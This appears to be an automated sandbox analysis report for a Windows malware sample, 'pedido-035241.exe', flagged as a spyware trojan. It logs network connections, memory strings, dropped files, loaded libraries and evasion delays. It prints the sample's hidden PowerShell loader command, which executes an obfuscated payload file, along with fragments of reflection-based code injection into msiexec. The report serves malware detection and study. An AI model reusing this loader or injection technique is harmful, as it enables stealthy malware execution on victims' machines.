Source: msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000003.2471471790.000000000894B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2981297005.00000000245C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000245B4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2981297005.00000000245BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown | Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown | Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\pedido-035241.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_00406BFE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BED278
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE5362
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEC146
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEC738
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEC468
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BECA08
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEE988
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BECFAA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BECCD8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE7118
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE29E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEE97A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BEF961
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE9DE0
Source: pedido-035241.exe | Static PE information: invalid certificate
Source: pedido-035241.exe, 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
Source: pedido-035241.exe | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
Source: pedido-035241.exe.1.dr | Binary or memory string: OriginalFilenamebiddens lokalsamfund.exe4 vs pedido-035241.exe
Source: pedido-035241.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/16@6/6
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_004021AA CoCreateInstance
Source: C:\Users\user\Desktop\pedido-035241.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\pedido-035241.exe | File created: C:\Users\user\AppData\Local\Temp\nsu71F0.tmp
Source: pedido-035241.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\pedido-035241.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\pedido-035241.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\pedido-035241.exe | File read: C:\Users\user\Desktop\pedido-035241.exe
Source: unknown | Process created: C:\Users\user\Desktop\pedido-035241.exe "C:\Users\user\Desktop\pedido-035241.exe"
Source: C:\Users\user\Desktop\pedido-035241.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\pedido-035241.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: pedido-035241.exe | Static file information: File size 1093536 > 1048576
Source: pedido-035241.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match | File source: 00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fenghwang $tendon $Broggle), (Safiansbindenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gumpetungt = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Blthavs)), $Tryklaasene).DefineDynamicModule($Alkoholtype, $false).DefineType($Coleopterist, $fodfolksregimenter, [System.MulticastDel
Source: C:\Users\user\Desktop\pedido-035241.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
Source: C:\Users\user\Desktop\pedido-035241.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE891E pushad ; iretd 6_2_02BE891F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE8C2F pushfd ; iretd 6_2_02BE8C30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BE8DDF push esp; iretd 6_2_02BE8DE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_04067104 pushad ; iretd 6_2_0406710B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_04064F92 push eax; retf 6_2_04064F93
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_04066828 push edx; ret 6_2_04066837
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_040629D1 push esi; retf 6_2_040629D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe
Source: C:\Users\user\Desktop\pedido-035241.exe | File created: C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll
Source: C:\Users\user\Desktop\pedido-035241.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.ini

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\pedido-035241.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599890
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599781
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599671
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599452
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599343
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599234
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599125
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599015
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598906
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598796
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598687
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598578
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598468
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598359
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598250
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598140
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598031
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597921
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597812
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597702
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597593
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597484
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597375
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597265
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597156
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597046
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596937
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596827
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596718
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596609
